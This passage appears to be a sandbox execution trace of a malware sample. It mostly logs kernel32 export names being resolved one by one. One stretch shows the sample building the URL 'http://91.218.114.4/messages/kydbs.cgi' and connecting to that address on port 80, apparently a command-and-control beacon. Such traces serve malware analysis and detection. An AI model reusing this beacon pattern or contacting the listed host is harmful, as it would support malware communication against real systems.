(lpString="ENCODEPOINTER") returned 13 [0090.261] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0090.261] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0090.261] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0090.261] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0090.261] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0090.261] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0090.261] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0090.261] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0090.261] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0090.261] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0090.261] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0090.261] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0090.261] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0090.261] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0090.261] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0090.261] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0090.261] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0090.261] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0090.261] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0090.261] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0090.261] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0090.261] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0090.261] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0090.261] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0090.261] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0090.261] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0090.261] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0090.262] wsprintfA (in: param_1=0xfb0000, param_2="http://%s%s" | out: param_1="http://91.218.114.4/messages/kydbs.cgi?o=6hs&k=yw33&c=21nd") returned 58 [0090.262] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0090.265] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x10f0000 [0090.268] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x1140000 [0090.269] VirtualAlloc (lpAddress=0x0, dwSize=0x34, flAllocationType=0x3000, flProtect=0x4) returned 0x1190000 [0090.269] inet_pton (in: Family=2, pszAddrString="91.218.114.4", pAddrBuf=0x3c2f184 | out: pAddrBuf=0x3c2f184) returned 1 [0090.269] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x3c2f5d0 | out: lpWSAData=0x3c2f5d0) returned 0 [0090.269] socket (af=2, type=1, protocol=6) returned 0x418 [0090.270] inet_addr (cp="91.218.114.4") returned 0x472da5b [0090.270] htons (hostshort=0x50) returned 0x5000 [0090.270] connect (s=0x418, name=0x3c2f160*(sa_family=2, sin_port=0x50, sin_addr="91.218.114.4"), namelen=16) returned 0 [0090.327] lstrlenA (lpString="kernel32.dll") returned 12 [0090.328] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0090.328] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0090.328] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0090.328] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0090.328] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0090.328] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0090.328] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0090.328] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0090.328] lstrlenA (lpString="ADDATOMA") returned 8 [0090.328] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0090.328] lstrlenA (lpString="ADDATOMW") returned 8 [0090.328] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0090.328] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0090.328] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0090.328] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0090.328] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0090.328] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0090.328] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0090.328] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0090.328] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0090.328] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0090.328] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0090.328] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0090.328] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0090.328] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0090.328] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0090.328] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0090.328] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0090.328] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0090.328] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0090.328] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0090.328] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0090.328] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0090.328] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0090.328] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0090.328] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0090.329] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0090.329] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0090.329] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0090.329] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0090.329] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0090.329] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0090.329] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0090.329] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0090.329] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0090.329] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0090.329] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0090.329] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0090.329] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0090.329] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0090.329] lstrlenA (lpString="BACKUPREAD") returned 10 [0090.329] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0090.329] lstrlenA (lpString="BACKUPSEEK") returned 10 [0090.329] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0090.329] lstrlenA (lpString="BACKUPWRITE") returned 11 [0090.329] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0090.329] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0090.329] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0090.329] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0090.329] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0090.329] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0090.329] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0090.329] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0090.329] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0090.329] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0090.329] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0090.329] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0090.329] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0090.329] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0090.329] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0090.329] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0090.329] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0090.329] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0090.330] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0090.330] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0090.330] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0090.330] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0090.330] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0090.330] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0090.330] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0090.330] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0090.330] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0090.330] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0090.330] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0090.330] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0090.330] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0090.330] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0090.330] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0090.330] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0090.330] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0090.330] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0090.330] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0090.330] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0090.330] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0090.330] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0090.330] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0090.330] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0090.330] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0090.330] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0090.330] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0090.330] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0090.330] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0090.330] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0090.330] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0090.330] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0090.330] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0090.330] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0090.330] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0090.330] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0090.330] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0090.331] lstrlenA (lpString="BEEP") returned 4 [0090.331] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0090.331] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0090.331] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0090.331] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0090.331] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0090.331] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0090.331] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0090.331] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0090.331] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0090.331] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0090.331] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0090.331] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0090.331] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0090.331] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0090.331] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0090.331] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0090.331] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0090.331] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0090.331] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0090.331] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0090.331] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0090.331] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0090.331] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0090.331] lstrlenA (lpString="CANCELIO") returned 8 [0090.331] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0090.331] lstrlenA (lpString="CANCELIOEX") returned 10 [0090.331] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0090.331] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0090.331] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0090.331] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0090.331] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0090.331] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0090.331] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0090.331] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0090.331] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0090.331] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0090.331] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0090.332] lstrlenA (lpString="CHECKELEVATION") returned 14 [0090.332] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0090.332] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0090.332] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0090.332] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0090.332] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0090.332] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0090.332] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0090.332] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0090.332] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0090.332] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0090.332] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0090.332] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0090.332] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0090.332] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0090.332] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0090.332] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0090.332] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0090.332] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0090.332] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0090.332] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0090.332] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0090.332] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0090.332] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0090.332] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0090.332] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0090.332] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0090.332] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0090.332] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0090.332] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0090.332] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0090.332] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0090.332] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0090.332] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0090.332] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0090.332] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0090.332] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0090.333] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0090.333] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0090.333] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0090.333] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0090.333] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0090.333] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0090.333] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0090.333] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0090.333] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0090.333] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0090.333] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0090.333] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0090.333] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0090.333] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0090.333] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0090.333] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0090.333] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0090.333] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0090.333] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0090.333] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 